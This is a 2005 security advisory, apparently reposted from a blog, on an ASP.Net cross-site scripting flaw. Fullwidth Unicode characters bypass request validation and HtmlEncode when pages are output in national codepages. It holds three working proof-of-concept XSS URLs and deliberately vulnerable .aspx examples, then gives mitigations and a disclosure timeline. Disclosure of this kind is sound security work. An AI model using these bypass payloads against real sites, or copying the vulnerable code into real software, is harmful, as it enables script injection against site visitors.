来源:Superhei's Blog
Andrey Rusyaev, post-graduate student, Security Chair, FESU (Far Eastern State \
University), Vladivostok, Russia, andir[SPAM-PROTECT]@it-project.ru.
February 9, 2005, updated February 14, 2005
Abstract
In specific conditions the cross-site scripting attack (XSS) [1] are possible on web \
site under management ASP.Net, because used a wrong filtration of special HTML \
characters. Attack exploits vulnerability of mechanism of converting Unicode strings \
[2] to national ASCII codepages. The basic problem arises from the lack of a \
filtration of special HTML characters in range U+ff00-U+ff60 (fullwidth ASCII \
characters [3]).
Introduction
The problem has been discovered in August 2004. Affected all versions of .Net \
Framework what exist at present day:
* .Net Framework, version 1.0
* .Net Framework, version 1.0 + service pack 1
* .Net Framework, version 1.0 + service pack 2
* .Net Framework, version 1.1
* .Net Framework, version 1.1 + service pack 1
* .Net Framework, version 1.1 + service pack 1 + Security Bulletin MS05-004 from \
February 8, 2005
After some testing, similar problem has been discovered in free implementation of \
.Net Framework by Mono Project [4]. Affected following versions:
* Mono, version 1.0.5.
Note: Another versions has not been tested.
Background
.Net Framework manipulates strings in Unicode only. Converting from/to national \
codepages ASCII is possible for input/output respectively. In particular, HTML text \
may be outputted on Web page in national ASCII codepage (such as 'windows-1251', \
'koi-8', and more) with using ASP.Net. In this conditions Unicode characters from \
range U+ff00-U+ff60 (fullwidth ASCII characters) would be converted to normal ASCII \
characters respectively. Among fullwidth ASCII characters present some special HTML \
characters (such as '<', '>', and others), which may be used for injecting malicious \
HTML code or malicious script code (with <script> HTML tag) or other variants (more \
details in [5]).
Vulnerability Details
Has been discovered that mechanism of ASP.Net has no filtration of special HTML \
characters (such as '>', '<' and others) in Unicode strings for output web page in \
one from national ASCII codepages.
1. Injection of special HTML characters to ASP.Net web-page with using Unicode \
characters from fullwidth ASCII characters range.
Example:
http://server.com/attack1.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff \
1c/script%uff1e
Web page 'attack1.aspx' prints HTTP request parameter 'test'.
Web page like following:
<!-- Web page attack1.aspx -->
<% @Page Language="cs" %>
<%
Response.Write(Request.QueryString["test"]); // Attack through URL parameter
%>
Web.config for server.com like following:
<configuration>
<system.web>
<globalization responseEncoding="windows-1251" />
</system.web>
</configuration>
2. ASP.NET Request Validation Bypass Vulnerability.
The "Request Validation" mechanism designed to protect against Cross-Site \
Scripting and SQL injection allows restricted tags in Unicode range of fullwidth \
ASCII characters U+ff00-U+ff60.
Example:
http://server.com/attack2.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1 \
c/script%uff1e
Web page 'attack2.aspx' prints HTTP request parameter 'test'.
Web page like following:
<!-- Web page attack2.aspx -->
<% @Page Language="cs" validateRequest="true" %>
<%
Response.Write(Request.QueryString["test"]); // Attack through URL parameter
%>
Web.config for server.com like following:
<configuration>
<system.web>
<globalization responseEncoding="windows-1251" />
</system.web>
</configuration>
Note: attribute of ASP.Net Web page - validateRequest allowed only for ASP.Net \
of version 1.1 and more, or for Mono (no any information about versions) [6].
3. HTML Encoding methods bypass
Note: This attack does not applied to ASP.Net in Mono implementation.
HttpServerUtility.HtmlEncode has no filtration mechanism for Unicode characters \
from range U+ff00-U+ff60.
The methods for encoding special HTML characters does not protect from attacks \
in previous examples. Encoding process used before converting to national ASCII \
codepage for output, and attacker may use fullwidth ASCII characters for injecting \
malicious code on Web page.
Example:
http://server.com/attack3.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/scr \
ipt%uff1e
Web page 'attack3.aspx' prints:
1. HTTP request parameter 'test',
2. Some string with injected Unicode characters.
Web page like following:
<!-- Web page attack3.aspx -->
<% @Page Language="cs" %>
<%
Response.Write(Server.HtmlEncode(Request.QueryString["test"])); // 1) Attack \
through URL parameter
string code = \
Server.HtmlEncode("\xff1cscript\xff1ealert('vulnerability')\xff1c/script\xff1e"); // \
2) Attack through injected Unicode characters Response.Write(code);
%>
Web.config for server.com like following:
<configuration>
<system.web>
<globalization responseEncoding="windows-1251" />
</system.web>
</configuration>
Protection Methods
Some variants of protection methods may be proposed:
* Use only Unicode codepage for output on ASP.Net pages, for this purpose add \
web.config like following:
<configuration>
<system.web>
<globalization responseEncoding="utf-8" />
</system.web>
</configuration>
* If you cannot use Unicode, you must to filter fullwidth ASCII characters from \
any untrusted data sources (user input, HTTP headers, some components ouput and other \
data).
More Information
About this vulnerability has been reported to Microsoft Security Response Center at \
August 2, 2004 and received answer that opened case 5438 for description of \
vulnerability. Later, I received following answer:
"We have decided that a KB article and update to tools and/or best practice \
guidelines should be done for this, and will be as time permits. We are not tracking \
this case as a security bulletin".
Vulnerability has no patch at current moment (February 9, 2005).
References
1. CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests, \
http://www.cert.org/advisories/CA-2000-02.html 2. Unicode Home Page, \
http://unicode.org/. 3. Unicode.org, Halfwidth and Fullwidth Forms, \
http://www.unicode.org/charts/PDF/UFF00.pdf. 4. Mono Project, \
http://mono-project.com/. 5. CGISecurity.com, "The Cross Site Scripting FAQ.", May \
2002,
http://www.cgisecurity.com/articles/xss-faq.shtml. 6. .Net Framework SDK, \
@Page directive, ValidateRequest attribute, \
http://msdn.microsoft.com/librar ... genref/html/cpconPa \
ge.asp.
